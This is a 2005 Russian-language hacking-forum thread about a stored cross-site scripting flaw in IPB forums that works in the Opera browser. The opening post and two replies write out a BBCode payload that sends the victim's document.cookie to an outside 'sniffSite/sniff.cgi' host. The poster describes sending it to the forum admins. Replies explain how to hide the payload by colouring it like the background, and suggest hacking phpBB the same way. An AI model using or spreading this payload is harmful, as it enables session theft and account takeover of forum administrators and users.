HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу XSS в форуме IPB, на примере браузера Опера
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS в форуме IPB, на примере браузера Опера
  #1  
Старый 13.01.2005, 11:16
Fr13nd
Познающий
Регистрация: 03.11.2004
Сообщений: 48
С нами: 11324133

Репутация: 2
По умолчанию XSS в форуме IPB, на примере браузера Опера
Код:
[COLOR=]` style=background:url(javascript:document.images[68].src="http://sniffSite/sniff.cgi?"+document.cookie) [/COLOR]
послал админам в личку, потом был забанен....
потом доперло , что у админов опера,
так он и есть

отображение хсс в опере

Код:
'>` style=background:url(javascript:document.images[1].src="sniff?"+document.cookie)
как сделать чтоб хотябы код не было видно ?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 13.01.2005, 12:19
>>ElvI$<<
Познающий
Регистрация: 12.01.2005
Сообщений: 42
С нами: 11223265

Репутация: 1
По умолчанию
Внимательней читай коменты...
Цитата:
Егорыч++++

Совет. Поскольку, уязвимость не работает в других браузерах, то в Опере или Firefox видится всякая абракадабра. Этим можно выдать себя. Для того , чтоб себя не выдать можно покрасить сообщение под цвет фона.

[COLOR=]` style=background:url(javascript:document.ima
ges[68].src="http://sniffSite/sniff.cgi?"+document.cookie) [/COLOR]

Примерно так...
 
Ответить с цитированием

  #3  
Старый 13.01.2005, 12:20
>>ElvI$<<
Познающий
Регистрация: 12.01.2005
Сообщений: 42
С нами: 11223265

Репутация: 1
По умолчанию
ой 8) не корректно отобразилось...


[COLOR=цвет фона][COLOR=]` style=background:url(javascript:document.ima
ges[68].src="http://sniffSite/sniff.cgi?"+document.cookie) [/COLOR][/COLOR]

Вот и все...я уже давно допер,как их скрыть!
 
Ответить с цитированием

  #4  
Старый 13.01.2005, 14:39
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
С нами: 12604706

Репутация: 0


По умолчанию
Кстати, если хорошо подумать, то эту уязвимость можно адаптировать и под оперу...Без использования обратной кавычки
 
Ответить с цитированием

  #5  
Старый 13.01.2005, 19:15
>>ElvI$<<
Познающий
Регистрация: 12.01.2005
Сообщений: 42
С нами: 11223265

Репутация: 1
По умолчанию
да 8) А еще если хорошо подумать мона и Phpbb 2.0.11 через Xss ломануть 8)
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
В популярном форуме найдены уязвимости dance Мировые новости. Обсуждения. 4 01.11.2005 13:17
Опера 8.02 - раздают бесплатный код Asprin Мировые новости. Обсуждения. 1 31.08.2005 10:40



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.